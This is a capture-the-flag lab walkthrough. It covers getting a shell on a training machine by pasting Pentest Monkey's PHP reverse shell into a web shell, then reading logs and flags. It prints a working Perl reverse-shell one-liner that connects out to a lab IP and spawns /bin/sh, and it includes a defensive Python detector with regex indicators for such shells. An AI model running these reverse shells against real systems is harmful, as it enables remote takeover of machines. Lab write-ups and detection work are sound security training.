# First Contact

We have identified a potential attack surface on which we can execute PHP and shell commands. Running a reverse shell from the web shell gives us a shell back on the machine.

### Uploading a PHP Reverse Shell

For the PHP reverse shell, we’ll be using Pentest Monkey’s reverse shell, found [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) or in Kali under `/usr/share/webshells/php/php-reverse-shell.php`.

1. Modify the reverse shell to use your **tun0 IP address** and **port**.
2. Paste the PHP code into the web shell. Note: the first line **\<?php** and the last line **?>** need to be removed.
3. Start a netcat listener on port 53.
4. Execute the reverse shell.

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FyglQw6Cs06Wn8JIoTJWY%2Fphp_reverse01.png?alt=media&#x26;token=05ba2e83-d383-4b29-9bc9-c680305d46ff" alt=""></div>

Problem with the netcat listener on port 53:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FSdLpSla9YjRdEU3XeO5m%2Fphp_reverse02.png?alt=media&#x26;token=7bd49698-4c3d-4a3f-8261-a89d39547312" alt=""></div>

Kill the `systemd-resolved` process and start the netcat listener again.

Execute the reverse shell:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FqjqKn2L17nX5IEGbrybH%2Fphp_reverse04.png?alt=media&#x26;token=079dbc11-b8c3-42dc-bab1-bd01cb38fca4" alt=""></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FO6Oj9n3L73bAdZAvcvPT%2Fphp_reverse03.png?alt=media&#x26;token=4f1e7199-3302-48bf-b2e3-99af16b10e54" alt=""></div>

To answer the questions and find the flag, I need to focus on the logs.

Searching for logs: `cd /var/log`

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FM8gIVK7m0NfwOi1XCirc%2Fphp_reverse05.png?alt=media&#x26;token=57b90539-4ccd-49ed-9f8b-159100802fb5" alt="content of /var/log"></div>

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FtDtNoqshPBqs6z0UGCWX%2Fphp_reverse06.png?alt=media&#x26;token=b2fb319a-5285-48a1-90b5-2e1b84ff12f0" alt="content of login.log and flag.txt"></div>

Getting the root flag:

<div align="left"><img src="https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FArMlK7biPuDRpGZ0odnl%2Fphp_reverse07.png?alt=media&#x26;token=acdb78db-040d-4532-afe1-ac4b568949c4" alt="content of rot.txt"></div>

### Additional way to get a reverse shell

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md>" %}
Reverse shell cheatsheet
{% endembed %}

```
perl -e 'use Socket;$i="10.50.133.33";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

![Execute perl reverse shell](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F72VZYSPluXcSD5e1ziik%2Fperl_reverseshell.png?alt=media\&token=b1357ec8-2687-4db4-b68f-0aa0b03ae539)
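From the defender's side, the Perl one-liner above leaves a recognizable process event: an inline interpreter that sets up a socket, redirects stdio to it, and execs an interactive shell, all under the web server's account. The following detection sketch is an added example, not part of the original walkthrough; the event fields, the list of web server accounts, and the sample events are constructed assumptions.

```python
import re

# Indicators derived from the Perl one-liner shown above.
INDICATORS = {
    "inline_interpreter": re.compile(r"\b(perl|python[23]?|php|ruby)\s+-[cer]\b"),
    "socket_setup": re.compile(r"use Socket|socket\(|sockaddr_in\("),
    "stdio_to_socket": re.compile(r'open\(STD(IN|OUT|ERR),\s*">&'),
    "interactive_shell": re.compile(r"/bin/(ba)?sh\s+-i\b"),
}

# Assumption: accounts the web server runs as on the monitored host.
WEB_USERS = {"www-data", "apache", "nginx"}


def score_event(event):
    """Return the names of all indicators matched by one process event."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["cmd"])]
    if hits and event["user"] in WEB_USERS:
        hits.append("web_user")
    return hits


def is_alert(event):
    """Alert on a socket-backed shell, or any interactive shell from a web account."""
    hits = set(score_event(event))
    return ({"socket_setup", "interactive_shell"} <= hits
            or {"web_user", "interactive_shell"} <= hits)


# Constructed sample events (user + command line), e.g. from execve auditing.
EVENTS = [
    {"user": "www-data", "cmd": r"""perl -e 'use Socket;$i="192.0.2.10";$p=8001;"""
        r"""socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));"""
        r"""if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");"""
        r"""open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"""},
    {"user": "www-data", "cmd": "/usr/sbin/apache2 -k start"},
    {"user": "root", "cmd": "perl -e 'print 1'"},
    {"user": "www-data", "cmd": "/bin/sh -i"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(is_alert(ev), score_event(ev), ev["cmd"][:40])
```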

### Questions

![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FVkLslY61LmTxpYc3nJ1C%2Fquestions_task10.png?alt=media\&token=6f09b468-8946-4cb7-9074-c03afbecf18b)

